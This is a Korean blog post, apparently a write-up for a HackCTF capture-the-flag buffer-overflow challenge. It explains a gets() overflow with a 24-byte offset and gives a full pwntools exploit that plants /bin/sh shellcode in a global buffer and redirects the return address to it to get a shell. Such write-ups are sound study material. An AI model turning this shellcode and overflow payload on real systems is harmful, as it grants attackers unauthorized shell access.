ii4gsp
HackCTF - 내 버퍼가 흘러넘친다!!! 본문
파일을 다운받아 주자.
IDA로 열어보면 read()함수로 name에 0x32만큼 값을 넣는다.
name은 전역변수이다.
그리고 gets()함수로 변수 s에 입력을한다.
gets()함수에서 취약점이 발생한다.
s ~ sfp = 24
read함수로 name에 쉘 코드를 넣어놓고 ret를 name의 주소로하면 쉘을 획득한다.
name의 주소는 0x0804A060 이다.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3003)
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'
r.recvuntil('Name : ')
r.sendline(shellcode)
payload = ''
payload += '\x90' * 24
payload += p32(0x0804A060)
r.recvuntil('input : ')
r.sendline(payload)
r.interactive()
소스코드를 작성해주자.
'시스템 해킹 > HackCTF' 카테고리의 다른 글
HackCTF - x64 Simple_size_BOF (0) | 2020.02.09 |
---|---|
HackCTF - x64 Buffer Overflow (0) | 2020.02.09 |
HackCTF - Basic_FSB (0) | 2020.02.09 |
HackCTF - Basic_BOF #2 (0) | 2020.02.08 |
HackCTF - Basic_BOF #1 (0) | 2020.02.08 |
Comments